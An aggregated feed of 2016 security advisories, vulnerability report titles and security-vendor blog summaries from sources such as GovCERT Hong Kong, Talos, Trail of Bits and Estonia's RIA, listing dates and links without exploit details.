Microsoft has released 16 security bulletins addressing multiple vulnerabilities which affect several Microsoft products or components......

https://www.govcert.gov.hk/en/alerts_detail.php
The PhotoMiner Campaign
2016-06-14T13:00:00Z | 1465909200

In this report we will share our research on the PhotoMiner?s timelines, infection strategies, C&C servers and provide tools to help detect the malware.

https://www.akamai.com/blog/security/the-photominer-campaign
Ruby Psych::Emitter start_document Heap Overflow Vulnerability
2016-06-14T00:00:00Z | 1465862400

https://talosintelligence.com/vulnerability_reports/TALOS-2016-0032
Adobe Flash Player Infinite Recursion Arbitrary Read Access Violation
2016-06-14T00:00:00Z | 1465862400

https://talosintelligence.com/vulnerability_reports/TALOS-2016-0165
Ruby TclTkIp ip_cancel_eval Type Confusion Vulnerabilities
2016-06-14T00:00:00Z | 1465862400

https://talosintelligence.com/vulnerability_reports/TALOS-2016-0031
Ruby pack_pack Use After Free Vulnerability
2016-06-14T00:00:00Z | 1465862400

https://talosintelligence.com/vulnerability_reports/TALOS-2016-0033
Ruby Fiddle::Function.new Heap Overflow Vulnerability
2016-06-14T00:00:00Z | 1465862400

https://talosintelligence.com/vulnerability_reports/TALOS-2016-0034
Ruby WIN32OLE ole_invoke and ole_query_interface Type Confusion Vulnerabilities
2016-06-14T00:00:00Z | 1465862400

https://talosintelligence.com/vulnerability_reports/TALOS-2016-0029
E-riik 2018: Valmis 2016. aasta krüptograafiliste algoritmide elutsükli uuring
2016-06-08T21:00:00Z | 1465419600

Riigi Infosüsteemi Amet kinnitab, et olulistes Eesti infosüsteemides kasutatavad krüptograafilised lahendused on endiselt turvalised.

https://ria.ee/uudised/e-riik-2018-valmis-2016-aasta-kruptograafiliste-algoritmide-elutsukli-uuring
E-riik 2018: X-tee vahendab sellest nädalast alusteenusena plokiaheldust
2016-06-08T21:00:00Z | 1465419600

Alates sellest nädalast käivitati X-tee kasutajatele plokiaheldus-tehnoloogial põhinev ajatempliteenus (KSI blockchain).

https://ria.ee/uudised/e-riik-2018-x-tee-vahendab-sellest-nadalast-alusteenusena-plokiaheldust
E-riik 2018: Eesti küberturbeeksperdid valmistuvad eesistumiseks
2016-06-08T21:00:00Z | 1465419600

Järgmise kahe aasta üks suuremaid väljakutseid on Eesti Euroopa Liidu eesistumise küberturvalisuse tagamine.

https://ria.ee/uudised/e-riik-2018-eesti-kuberturbeeksperdid-valmistuvad-eesistumiseks
Security Alert (A16-06-01): Multiple Vulnerabilities in Firefox
2016-06-08T04:00:00Z | 1465358400

Mozilla has published security advisories to address multiple vulnerabilities found in Firefox. These vulnerabilities are caused by memory safety bugs in the browser engine, memory corruption, buffer overflow, use-after-free error and Mozilla Windows updater could be used to overwrite arbitrary files.

https://www.govcert.gov.hk/en/alerts_detail.php
IBM Domino KeyView PDF Filter Trailer ID Code Execution Vulnerability
2016-06-08T00:00:00Z | 1465344000

https://talosintelligence.com/vulnerability_reports/TALOS-2016-0092
ESnet iPerf3 JSON parse_string UTF Code Execution Vulnerability
2016-06-08T00:00:00Z | 1465344000

https://talosintelligence.com/vulnerability_reports/TALOS-2016-0164
IBM Domino KeyView PDF Filter Encrypted Stream Code Execution Vulnerability
2016-06-08T00:00:00Z | 1465344000

https://talosintelligence.com/vulnerability_reports/TALOS-2016-0089
Google Chrome PDFium jpeg2000 SIZ Code Execution Vulnerability
2016-06-08T00:00:00Z | 1465344000

https://talosintelligence.com/vulnerability_reports/TALOS-2016-0174
IBM Domino KeyView PDF Filter BaseFont Code Execution Vulnerability
2016-06-08T00:00:00Z | 1465344000

https://talosintelligence.com/vulnerability_reports/TALOS-2016-0091
IBM Domino KeyView PDF Filter Stream Length Code Execution Vulnerability
2016-06-08T00:00:00Z | 1465344000

https://talosintelligence.com/vulnerability_reports/TALOS-2016-0090
Eesti parim mobiilirakendus 2016 on Pipedrive
2016-06-07T21:00:00Z | 1465333200

Täna lõuna ajal valis asjatundjate žürii kümne finalisti seast Eesti parimaks mobiilirakenduseks müügijuhtimistarkvara Pipedrive'i.

https://ria.ee/uudised/eesti-parim-mobiilirakendus-2016-pipedrive
What to consider when evaluating current and future vendors?
2016-06-06T08:48:27Z | 1465202907

Welcome to part 3 of the How to Re-Evaluate Your Network Security Vendor (here are part 1 and part 2), the most important blog series that security-minded C-Levels and directors will read all year! In this part, we cut to the chase and offer you a downloadable checklist for evaluating your current network security vendor.... The post What to consider when evaluating current and future vendors? appeared first on Cato Networks.

https://www.catonetworks.com/blog/what-to-consider-when-evaluating-current-and-future-vendors/
2000 cuts with Binary Ninja
2016-06-03T16:14:34Z | 1464970474

Using Vector35’s Binary Ninja, a promising new interactive static analysis and reverse engineering platform, I wrote a script that generated “exploits” for 2,000 unique binaries in this year’s DEFCON CTF qualifying round. If you’re wondering how to remain competitive in a post-DARPA DEFCON CTF, I highly recommend you take a look at Binary Ninja. Before […]

https://blog.trailofbits.com/2016/06/03/2000-cuts-with-binary-ninja/
The Convergence Of WAN, CDN And Cloud Security
2016-05-26T10:44:56Z | 1464259496

In a recent note, industry analyst and blogger Ernie Regalado from Bizety has overviewed key trends in the convergence of CDN,  WAN and Cloud Security. The next generation WAN will integrate these domains into a unified architecture. By putting the WAN into a Cloud-based CDN infrastructure, it is possible to control Internet routing and reduce... The post The Convergence Of WAN, CDN And Cloud Security appeared first on Cato Networks.

https://www.catonetworks.com/blog/the-convergence-of-wan-cdn-and-cloud-security/
Security Alert (A16-05-05): Multiple Vulnerabilities in Apple iOS
2016-05-25T04:00:00Z | 1464148800

Apple has released software update fixing 39 vulnerabilities in iOS versions prior to iOS 9.3.2. These vulnerabilities are caused by problems in various iOS components.

https://www.govcert.gov.hk/en/alerts_detail.php
MPLS, SD-WAN and Network Security
2016-05-24T11:08:10Z | 1464088090

TechTarget has recently published an interesting article on the security implications of deploying SD-WAN using 2 customer case studies. In both cases, the customers wanted to extend an MPLS-only WAN into a hybrid WAN based on a combined MPLS and Internet connectivity. There are several interesting anecdotes by the financial services customers (Scott Smith and... The post MPLS, SD-WAN and Network Security appeared first on Cato Networks.

https://www.catonetworks.com/blog/mpls-sdwan-and-network-security/
How to Re-Evaluate Your Network Security Vendors | Part 2
2016-05-23T09:32:49Z | 1463995969

When should you re-Evaluate your vendor? Welcome to the exclusive How to Re-Evaluate Your Network Security Vendors blog series! In this article, we will cover when you should re-evaluate your network security vendor. The first step in re-evaluating your security vendor is finding the optimal timing for it. In this section we will review several... The post How to Re-Evaluate Your Network Security Vendors | Part 2 appeared first on Cato Networks.

https://www.catonetworks.com/blog/how-to-re-evaluate-your-network-security-vendors-part-2/
Empire Hacking Turns One
2016-05-19T11:50:13Z | 1463658613

In the year since we started this bi-monthly meetup, we’ve been thrilled by the community that it has attracted. We’ve had some excellent presentations on pragmatic security research, shared our aspirations and annoyances with our work, and made some new friends. It’s a wonderful foundation for an even better year two! To mark the group’s […]

https://blog.trailofbits.com/2016/05/19/empire-hacking-turns-one/
Riigiportaalis saab kontrollida elatisvõlgnevust
2016-05-18T21:00:00Z | 1463605200

Sellest nädalast saab portaalis eesti.ee kontrollida, kas inimesel on elatisvõlg ja kui suur see on.

https://ria.ee/uudised/riigiportaalis-saab-kontrollida-elatisvolgnevust
ProtoFuzz: A Protobuf Fuzzer
2016-05-18T11:50:57Z | 1463572257

Google’s Protocol Buffers (protobuf) is a common method of serializing data, typically found in distributed applications. Protobufs simplify the generally error-prone task of parsing binary data by letting a developer define the type of data, and letting a protobuf compiler (protoc) generate all the serialization and deserialization code automatically. Fuzzing a service expecting protobuf-encoded structures […]

https://blog.trailofbits.com/2016/05/18/protofuzz-a-protobuf-fuzzer/
South Korea’s Adviser in Cyber Security to open 28th Annual FIRST Conference in Seoul
2016-05-17T19:00:00Z | 1463511600

The Forum of Incident Response and Security Teams (FIRST), a recognized global leader in incident response, has announced the line-up for its 28th Annual Conference, which takes place this June (12th – 18th) in Seoul, South Korea.

https://www.first.org/newsroom/releases/20160517
How to Re-Evaluate Your Network Security Vendors
2016-05-16T12:19:53Z | 1463401193

Part 1: Why You Should Re-evaluate Your Network Security Vendor Welcome to the most important blog post series that you will read all year! In this one-of-a-kind series, we will help C-Levels and directors reach better decisions regarding security strategy and choice of security vendor with the goal of making network security simpler, better and... The post How to Re-Evaluate Your Network Security Vendors appeared first on Cato Networks.

https://www.catonetworks.com/blog/how-to-re-evaluate-your-network-security-vendors/
Security Alert (A16-05-04): Multiple Vulnerabilities in Adobe Flash Player
2016-05-13T04:00:00Z | 1463112000

Security updates are released for Adobe Flash Player to address multiple vulnerabilities. It is reported that the vulnerability CVE-2016-4117 is being actively exploited.

https://www.govcert.gov.hk/en/alerts_detail.php
Valitsus kiitis heaks küberintsidentide lahendamise plaani
2016-05-12T21:00:00Z | 1463086800

Valitsus kiitis heaks ulatusliku küberintsidendi hädaolukorra lahendamise plaani, mis arvestab kübervaldkonna muutunud vajadustega ning aitab tekkivate kriiside lahendamisele oluliselt kaasa.

https://ria.ee/uudised/valitsus-kiitis-heaks-kuberintsidentide-lahendamise-plaani
Security Alert (A16-05-02): Multiple Vulnerabilities in Microsoft Products (May 2016)
2016-05-11T04:00:00Z | 1462939200

Microsoft has released 16 security bulletins addressing multiple vulnerabilities which affect several Microsoft products or components....

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A16-05-03): Multiple Vulnerabilities in Adobe Acrobat/Reader
2016-05-11T04:00:00Z | 1462939200

Security updates are released for Adobe Acrobat/Reader to address multiple vulnerabilities....

https://www.govcert.gov.hk/en/alerts_detail.php
7zip UDF CInArchive::ReadFileItem Code Execution Vulnerability
2016-05-10T00:00:00Z | 1462838400

https://talosintelligence.com/vulnerability_reports/TALOS-2016-0094
7zip HFS+ NArchive::NHfs::CHandler::ExtractZlibFile Code Execution Vulnerability
2016-05-10T00:00:00Z | 1462838400

https://talosintelligence.com/vulnerability_reports/TALOS-2016-0093
Three Ways Network Complexity Fuels the IT Security Workforce Shortage
2016-05-09T13:50:28Z | 1462801828

The workforce shortage in the IT security field is real and shows no immediate signs of improvement. Recent research by global IT and cybersecurity organization ISACA highlights just how big the problem is. Of the 461 cybersecurity managers and practitioners surveyed globally, 60% said that less than half of their candidates were qualified upon hiring. Additionally,... The post Three Ways Network Complexity Fuels the IT Security Workforce Shortage appeared first on Cato Networks.

https://www.catonetworks.com/blog/three-ways-network-complexity-fuels-the-it-security-workforce-shortage/
The DBIR’s ‘Forest’ of Exploit Signatures
2016-05-05T20:56:12Z | 1462481772

If you follow the recommendations in the 2016 Verizon Data Breach Investigations Report (DBIR), you will expose your organization to more risk, not less. The report’s most glaring flaw is the assertion that the TLS FREAK vulnerability is among the ‘Top 10’ most exploited on the Internet. No experienced security practitioner believes that FREAK is […]

https://blog.trailofbits.com/2016/05/05/the-dbirs-forest-of-exploit-signatures/
Is MPLS a must-have component in your enterprise network architecture?
2016-05-05T12:36:51Z | 1462451811

MPLS cost reduction is the target of the emerging SD-WAN market that is bustling with solutions looking to take the corporate wide area network to a whole new level. The core value proposition of SD-WAN is the use of a standard, low-cost Internet link to augment an expensive managed, low-latency and guaranteed capacity MPLS link.... The post Is MPLS a must-have component in your enterprise network architecture? appeared first on Cato Networks.

https://www.catonetworks.com/blog/is-mpls-a-must-have-component-in-your-enterprise-network-architecture/
Security Alert (A16-05-01): Multiple Vulnerabilities in OpenSSL
2016-05-04T04:00:00Z | 1462334400

Multiple vulnerabilities are found in the OpenSSL library. The vulnerabilities are caused by padding oracle weakness, and memory corruption when applications parse and re-encode X.509 certificates, or verify RSA signatures on X.509 certificates....

https://www.govcert.gov.hk/en/alerts_detail.php
Libarchive zip zip_read_mac_metadata Code Execution Vulnerability
2016-05-01T00:00:00Z | 1462060800

https://talosintelligence.com/vulnerability_reports/TALOS-2016-0155
Security Alert (A16-04-06): Vulnerability in Apache Struts
2016-04-28T04:00:00Z | 1461816000

A vulnerability is found in Apache Struts that could allow remote code execution. Reports indicate that exploit code was released and the vulnerability is being actively exploited in targeted attacks...

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A16-04-05): Multiple Vulnerabilities in Firefox
2016-04-27T04:00:00Z | 1461729600

Mozilla has published security advisories to address multiple vulnerabilities found in Firefox.

https://www.govcert.gov.hk/en/alerts_detail.php
This is Why the Internet is Broken: a Technical Perspective
2016-04-26T08:51:45Z | 1461660705

Anyone with hands-on experience setting up long-haul VPNs over the Internet knows it’s not a pleasant exercise. Even factoring out the complexity of appliances and the need to work with old relics like IPSEC, managing latency, packet loss and high availability remain huge problems. Service providers also know this — and make billions on MPLS.... The post This is Why the Internet is Broken: a Technical Perspective appeared first on Cato Networks.

https://www.catonetworks.com/blog/the-internet-is-broken/
Network Time Protocol Ephemeral Association Time Spoofing Vulnerability
2016-04-26T00:00:00Z | 1461628800

https://talosintelligence.com/vulnerability_reports/TALOS-2016-0083
Network Time Protocol libntp Message Digest Disclosure Vulnerability
2016-04-26T00:00:00Z | 1461628800

https://talosintelligence.com/vulnerability_reports/TALOS-2016-0084
Network Time Protocol Crypto-NAK Preemptible Association Denial of Service Vulnerability
2016-04-26T00:00:00Z | 1461628800

https://talosintelligence.com/vulnerability_reports/TALOS-2016-0081
Network Time Protocol Forced Interleaved Time Spoofing Vulnerability
2016-04-26T00:00:00Z | 1461628800

https://talosintelligence.com/vulnerability_reports/TALOS-2016-0082
Network Time Protocol ntpd Reference Clock Impersonation Vulnerability
2016-04-26T00:00:00Z | 1461628800

https://talosintelligence.com/vulnerability_reports/TALOS-2016-0132
Software-defined Infrastructure:The convergence of Networking, Security and Cloud-based Software
2016-04-20T15:58:51Z | 1461167931

“Software-defined” is one of the hottest buzzwords around. What it means, in practical terms, is vague at best. The notion of “software-defined” touches on a couple of key drivers of IT infrastructure innovation: speed and cost. Like any other service provider, IT needs to move at the speed of its customers (the business) and adapt... The post Software-defined Infrastructure:The convergence of Networking, Security and Cloud-based Software appeared first on Cato Networks.

https://www.catonetworks.com/blog/software-defined-infrastructure-the-convergence-of-networking-security-and-cloud-based-software/
Security Alert (A16-04-04): Multiple Vulnerabilities in Oracle Java and Oracle Products (April 2016)
2016-04-20T04:00:00Z | 1461124800

Oracle has released Critical Patch Update (CPU) Advisory with collections of patches for multiple security vulnerabilities found in Java SE and various Oracle products...

https://www.govcert.gov.hk/en/alerts_detail.php
How to Report Your Performance Test Results Like a Pro
2016-04-20T04:00:00Z | 1461124800

Performance tests try to reduce the risks of downtime or outages on multi-user systems by conducting experiments that use load to reveal limitations and errors in the system. Testing usually involves assessing the performance and capacity of systems that were expensive and time-consuming to build.

https://www.akamai.com/blog/developers/how-to-report-your-performance-test-results-like-a-pro
Oracle IOT IX SDK libvs_pdf XRef Index Code Execution Vulnerability
2016-04-19T00:00:00Z | 1461024000

https://talosintelligence.com/vulnerability_reports/TALOS-2016-0086
Mullu kasvas Eestis hüppeliselt lunavara levik
2016-04-18T21:00:00Z | 1461013200

2015. aastal andis Eesti küberruumis tooni krüpteeriva lunavara juhtumite kasv. See selgub täna esitletud Riigi Infosüsteemi Ameti küberturvalisuse teenistuse 2015. aasta kokkuvõttest.

https://ria.ee/uudised/mullu-kasvas-eestis-huppeliselt-lunavara-levik
Security Alert (A16-04-03): Multiple Vulnerabilities in Apple QuickTime
2016-04-15T04:00:00Z | 1460692800

Multiple vulnerabilities are found in Apple QuickTime. A remote attacker could exploit the vulnerabilities by enticing a user to open a specially crafted web page or movie file...

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A16-04-02): Multiple Vulnerabilities in Microsoft Products (April 2016)
2016-04-13T04:00:00Z | 1460520000

Microsoft has released 13 security bulletins addressing multiple vulnerabilities which affect several Microsoft products or components...

https://www.govcert.gov.hk/en/alerts_detail.php
SD-WAN does Backhauling: Aren’t we trying to get rid of that Trombone?
2016-04-11T09:34:29Z | 1460367269

We have written in the past about the trombone effect or the implications of traffic backhauling on network security and the user experience. Backhauling is a way a network team is solving a security problem: providing secure internet access for all locations. Backhauling moves the traffic to a datacenter where firewalls are deployed and a... The post SD-WAN does Backhauling: Aren’t we trying to get rid of that Trombone? appeared first on Cato Networks.

https://www.catonetworks.com/blog/sd-wan-does-backhauling-arent-we-trying-to-get-rid-of-that-trombone/
Security Alert (A16-04-01): Multiple Vulnerabilities in Adobe Flash Player
2016-04-08T04:00:00Z | 1460088000

Security updates are released for Adobe Flash Player to address multiple vulnerabilities caused by memory layout randomisation problem, type confusion, security bypass, use-after-free, stack overflow and memory corruption errors. It is reported that the vulnerability CVE-2016-1019 is being actively exploited for Windows systems running Flash Player version 20.0.0.306 and earlier.

https://www.govcert.gov.hk/en/alerts_detail.php
Hacker Handle Bounty
2016-04-01T11:50:44Z | 1459511444

It’s time to close this chapter of our industry’s past. To distance ourselves from the World Wrestling Federation and comic book superheroes. We’re talking about hacker handles: Dildog, Thomas Dullien, Matt Blaze etc. When the Internet was young and fancy-free, hacker handles had their place. They afforded anonymity and supported the curious to explore the […]

https://blog.trailofbits.com/2016/04/01/hacker-handle-bounty/
Security Alert (A16-03-10): Multiple Vulnerabilities in Apple iOS
2016-03-31T04:00:00Z | 1459396800

Apple has released software update fixing 39 vulnerabilities in iOS versions prior to iOS 9.3. These vulnerabilities are caused by problems in various iOS components. There are multiple attack vectors, the attacker could bypass Apple's certificate pinning and inject messages, or entice a user to connect a USB device, open a specially crafted PDF file, font file, XML document, web page or install a malicious application to exploit the vulnerabilities.

https://www.govcert.gov.hk/en/alerts_detail.php
Lhasa lha decode_level3_header Heap Corruption Vulnerability
2016-03-31T00:00:00Z | 1459382400

https://talosintelligence.com/vulnerability_reports/TALOS-2016-0095
FIRST publishes Security Incident Response Teams (SIRTs) Services Framework Version 1.0 and commits to developing training content to support it
2016-03-30T23:00:00Z | 1459378800

The Forum of Incident Response and Security Teams, Inc. (FIRST) has announced publication of the SIRT Services Framework Version 1.0. This initial release provides an update on the services provided by Security Incident Response Teams and was developed in collaboration with experts from 25 countries across 6 continents.

https://www.first.org/global/education
Security Alert (A16-03-08): Multiple Vulnerabilities in Cisco Products (March 2016)
2016-03-24T04:00:00Z | 1458792000

Cisco has released six security advisories fixing a number of vulnerabilities in Cisco IOS, IOS XE, NX-OS and Cisco Unified Communications Manager software. An unauthenticated remote attacker could exploit the vulnerabilities in relation to several functions or protocols including Session Initiation Protocol (SIP), DHCPv6 relay feature, handling of Internet Key Exchange version 2 (IKEv2) fragmentation code, smart install client feature, Locator/ID Separation Protocol (LISP), and Wide Area Application Services (WAAS) Express feature. There are a multitude of attack vectors, a remote attacker could try to send malformed SIP message or LISP packet, specially crafted DHCPv6 relay message, UDP packets or Smart Install packets, or route a crafted TCP segment to/through a vulnerable device.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A16-03-09): Vulnerability in Oracle Java
2016-03-24T04:00:00Z | 1458792000

Oracle has published a security advisory to address a security vulnerability found in Java SE sub-component Hotspot that could be exploited without authentication. An attacker could entice a user to open a specially crafted web page to exploit the vulnerability. Reports indicate that technical details of the vulnerability are publicly disclosed.

https://www.govcert.gov.hk/en/alerts_detail.php
Apple OS X Gen6Accelerator IOGen575Shared::new_texture Local Privilege Escalation Vulnerability
2016-03-22T00:00:00Z | 1458604800

https://talosintelligence.com/vulnerability_reports/TALOS-2016-0088
Security Alert (A16-03-07): Multiple Vulnerabilities in Symantec Endpoint Protection
2016-03-21T04:00:00Z | 1458532800

Symantec has published a security advisory to address multiple vulnerabilities found in Symantec Endpoint Protection (SEP). These vulnerabilities are caused by insufficient security checks in SEP Manager (SEPM) and a problem in Application and Device Control component on a SEP client in validating external input. A remote attacker could entice a user to access a malicious link or open a malicious document to exploit the vulnerabilities.

https://www.govcert.gov.hk/en/alerts_detail.php
Algab ID-kaardi sertifikaatide kauguuendamine
2016-03-16T22:00:00Z | 1458165600

Alates tänasest on võimalik uuendada ID-kaartidel olevaid sertifikaate. Uuendamiseks tuleb lehelt installer.id.ee laadida alla ID-kaardi tarkvaraversioon 3.12.2, paigaldada see arvutisse ning järgida selle poolt antavaid juhiseid.

https://ria.ee/uudised/algab-id-kaardi-sertifikaatide-kauguuendamine
Security Alert (A16-03-06): Multiple Vulnerabilities in Adobe Flash Player
2016-03-11T04:00:00Z | 1457668800

Security updates are released for Adobe Flash Player to address multiple vulnerabilities caused by integer overflow, use-after-free, heap overflow and memory corruption errors. A remote attacker could entice a targeted user to open a specially crafted web page, Flash file, or document that supports embedded Flash content to exploit the vulnerabilities. It is reported that an exploit for CVE-2016-1010 is being used in limited, targeted attacks.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A16-03-05): Multiple Vulnerabilities in ISC BIND
2016-03-10T04:00:00Z | 1457582400

Multiple vulnerabilities are found in the ISC BIND software. A remote attacker could send a specially crafted query to trigger an assertion failure if DNS cookie support is enabled, remote commands on the control channel are accepted or when parsing signature records for DNAME records, causing the BIND to crash. Both authoritative and recursive name servers are vulnerable to these problems.

https://www.govcert.gov.hk/en/alerts_detail.php
The Problem with Dynamic Program Analysis
2016-03-09T18:53:34Z | 1457549614

Developers have access to tools like AddressSanitizer and Valgrind that will tell them when the code that they’re running accesses uninitialized memory, leaks memory, or uses memory after it’s been freed. Despite the availability of these excellent tools, memory bugs still persist, still get shipped to users, and still get exploited in the wild. Most […]

https://blog.trailofbits.com/2016/03/09/the-problem-with-dynamic-program-analysis/
Security Alert (A16-03-02): Multiple Vulnerabilities in Microsoft Products (March 2016)
2016-03-09T04:00:00Z | 1457496000

Microsoft has released 13 security bulletins addressing multiple vulnerabilities which affect several Microsoft products or components.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A16-03-03): Multiple Vulnerabilities in Adobe Acrobat and Reader
2016-03-09T04:00:00Z | 1457496000

Security updates are released for Adobe Acrobat and Reader to address multiple vulnerabilities caused by memory corruption and a directory search path issue. To successfully exploit the vulnerabilities, a remote attacker could entice a targeted user to open a specially crafted PDF file.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A16-03-04): Multiple Vulnerabilities in Firefox
2016-03-09T04:00:00Z | 1457496000

Mozilla has published security advisories to address multiple vulnerabilities found in Firefox. These vulnerabilities are caused by memory safety bugs in the browser engine, out-of-bounds read in ServiceWorkerManager, multiple use-after-free issues, heap-based buffer overflow and a number of problems in the Graphite 2 library. A remote attacker could entice a user to open a web page with specially crafted content to exploit the vulnerabilities.

https://www.govcert.gov.hk/en/alerts_detail.php
Revealing Guardicore Reveal?
2016-03-04T10:46:00Z | 1457088360

https://www.akamai.com/blog/security/revealing-guardicore-reveal
AKI ja RIA tihendavad koostööd
2016-03-03T22:00:00Z | 1457042400

Riigi Infosüsteemi Ameti (RIA) peadirektor Taimar Peterkop ja Andmekaitse Inspektsiooni (AKI) peadirektor Viljar Peep sõlmisid lepingu asutustevaheliseks koostööks.

https://ria.ee/uudised/aki-ja-ria-tihendavad-koostood
PPA: PPA väljastab 3. märtsist tugevama krüptograafiaga ID-kaarte
2016-03-02T22:00:00Z | 1456956000

Politsei- ja Piirivalveamet hakkas 3. märtsil teenindustes väljastama ID-kaarte, mis kasutavad senisest tugevamat krüptograafiat. Selliste kaartide tootmine algas 1. märtsil, tänasest väljastatakse neid inimestele ja need jõuavad kasutusse.

https://ria.ee/uudised/ppa-ppa-valjastab-3-martsist-tugevama-kruptograafiaga-id-kaarte
Security Alert (A16-03-01): Multiple vulnerabilities in IBM Notes
2016-03-02T04:00:00Z | 1456891200

Microsoft has released 13 security bulletins listed below addressing multiple vulnerabilities which affect several Microsoft products or components: MS16-023    Cumulative Security Update for Internet Explorer MS16-024    Cumulative Security Update for Microsoft Edge MS16-025    Security Update for Windows Library Loading to Address Remote Code Execution MS16-026    Security Update for Graphic Fonts to Address Remote Code Execution MS16-027    Security Update for Windows Media to Address Remote Code Execution MS16-028    Security Update for Microsoft Windows PDF Library to Address Remote Code Execution MS16-029    Security Update for Microsoft Office to Address Remote Code Execution MS16-030    Security Update for Windows OLE to Address Remote Code Execution MS16-031    Security Update for Microsoft Windows to Address Elevation of Privilege MS16-032    Security Update for Secondary Logon to Address Elevation of Privilege MS16-033    Security Update for Windows USB Mass Storage Class Driver to Address Elevation of Privilege MS16-034    Security Update for Windows Kernel-Mode Drivers to Address Elevation of Privilege MS16-035    Security Update for .NET Framework to Address Security Feature Bypass

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A16-02-06): Vulnerability in GNU C Library (glibc)
2016-02-18T04:00:00Z | 1455768000

A vulnerability was identified in GNU C Library (glibc) which is used in many Linux or Unix-based OS. Due to a stack-based buffer overflow vulnerability in the function " getaddrinfo()", applications using the glibc DNS client side resolver to resolve hostnames are vulnerable to attacks when resolving attacker-controlled domain names, DNS servers, or through a man-in-the-middle attack. Proof-of-concept codes were tested to successfully exploit the vulnerability.

https://www.govcert.gov.hk/en/alerts_detail.php
Multiple Dell SonicWALL Products Multiple Remote Code Execution Vulnerabilities
2016-02-17T15:59:00Z | 1455724740

The GMS ViewPoint (GMSVP) web application in Dell SonicWALL GMS, Analyzer, and UMA EM5000 7.2, 8.0, and 8.1 before Hotfix 168056 allows remote authenticated users to execute arbitrary commands via vectors related to configuration input. CVE: CVE-2016-2396 Last updated: March 12, 2018, 5:29 p.m.

https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2016-0001
Multiple Dell SonicWALL Products Multiple Remote Code Execution Vulnerabilities
2016-02-17T15:59:00Z | 1455724740

The cliserver implementation in Dell SonicWALL GMS, Analyzer, and UMA EM5000 7.2, 8.0, and 8.1 before Hotfix 168056 allows remote attackers to deserialize and execute arbitrary Java code via crafted XML data. CVE: CVE-2016-2397 Last updated: March 12, 2018, 5:31 p.m.

https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2016-0002
Apple can comply with the FBI court order
2016-02-17T07:42:34Z | 1455694954

Earlier today, a federal judge ordered Apple to comply with the FBI’s request for technical assistance in the recovery of the San Bernadino gunmen’s iPhone 5C. Since then, many have argued whether these requests from the FBI are technically feasible given the support for strong encryption on iOS devices. Based on my initial reading of […]

https://blog.trailofbits.com/2016/02/17/apple-can-comply-with-the-fbi-court-order/
Redirecting On the Edge
2016-02-12T21:08:00Z | 1455311280

On the web, every second counts. Service engineers and operations teams are looking for ways to save milliseconds from web pages' load times. One of the simpler ways to squeeze better performance from web pages already using a Content Delivery Network (CDN) is to move the redirection responses from origin to the edge.

https://www.akamai.com/blog/developers/redirecting-on-the-edge
Security Alert (A16-02-04): Vulnerability in Cisco Products
2016-02-12T04:00:00Z | 1455249600

Cisco has released a security advisory fixing a vulnerability in Cisco security appliances, virtual appliances and services modules: Cisco ASA Software IKEv1 and IKEv2 Buffer Overflow Vulnerability Due to a buffer overflow in the affected system, an unauthenticated remote attacker could send crafted UDP packets to an affected system to exploit the vulnerability.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A16-02-05): Multiple Vulnerabilities in Firefox
2016-02-12T04:00:00Z | 1455249600

Mozilla has published security advisories to address multiple vulnerabilities found in Firefox. These vulnerabilities are caused by circumventing the validation of internal instruction parameters in the Graphite 2 and violating the same-origin-policy using Service Workers with plugins. A remote attacker could entice a user to open a web page with specially crafted content to exploit the vulnerabilities.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A16-02-01): Multiple Vulnerabilities in Microsoft Products (February 2016)
2016-02-11T04:00:00Z | 1455163200

Microsoft has released 12 security bulletins listed below addressing multiple vulnerabilities which affect several Microsoft products or components: MS16-009    Cumulative Security Update for Internet Explorer MS16-011    Cumulative Security Update for Microsoft Edge MS16-012    Security Update for Microsoft Windows PDF Library to Address Remote Code Execution MS16-013    Security Update for Windows Journal to Address Remote Code Execution MS16-014    Security Update for Microsoft Windows to Address Remote Code Execution MS16-015    Security Update for Microsoft Office to Address Remote Code Execution MS16-016    Security Update for WebDAV to Address Elevation of Privilege MS16-017    Security Update for Remote Desktop Display Driver to Address Elevation of Privilege MS16-018    Security Update for Windows Kernel-Mode Drivers to Address Elevation of Privilege MS16-019    Security Update for .NET Framework to Address Denial of Service MS16-020    Security Update for Active Directory Federation Services to Address Denial of Service MS16-021    Security Update for NPS RADIUS Server to Address Denial of Service

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A16-02-02): Multiple Vulnerabilities in Adobe Flash Player
2016-02-11T04:00:00Z | 1455163200

Security updates are released for Adobe Flash Player to address multiple vulnerabilities caused by memory corruption, heap buffer overflow, type confusion and use-after-free error. A remote attacker could entice a targeted user to open a specially crafted web page, Flash file, or document that supports embedded Flash content to exploit the vulnerabilities.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A16-02-03): Vulnerability in Oracle Java
2016-02-11T04:00:00Z | 1455163200

Oracle has published a security advisory to address a security vulnerability found in Java SE. To exploit the vulnerability, an attacker could entice a user to open a specially crafted web page and download files into the user's system before installing a vulnerable version of Java SE 6, 7 or 8.

https://www.govcert.gov.hk/en/alerts_detail.php
Tidas: a new service for building password-less apps
2016-02-09T11:50:54Z | 1455018654

For most mobile app developers, password management has as much appeal as a visit to the dentist. You do it because you have to, but it is annoying and easy to screw up, even when using standard libraries or protocols like OAUTH. Your users feel the same way. Even if they know to use strong […]

https://blog.trailofbits.com/2016/02/09/tidas-a-new-service-for-building-password-less-apps/
Trane ComfortLink II SCC Service Hardcoded Credentials Vulnerability
2016-02-08T00:00:00Z | 1454889600

https://talosintelligence.com/vulnerability_reports/TALOS-2016-0028
Trane Comfortlink II DSS Service REG Handling Remote Code Execution Vulnerability
2016-02-08T00:00:00Z | 1454889600

https://talosintelligence.com/vulnerability_reports/TALOS-2016-0027
Trane Comfortlink II DSS Service Request Handling Remote Code Execution Vulnerability
2016-02-08T00:00:00Z | 1454889600

https://talosintelligence.com/vulnerability_reports/TALOS-2016-0026
Libgraphite Context Item Code Execution Vulnerability
2016-02-05T00:00:00Z | 1454630400

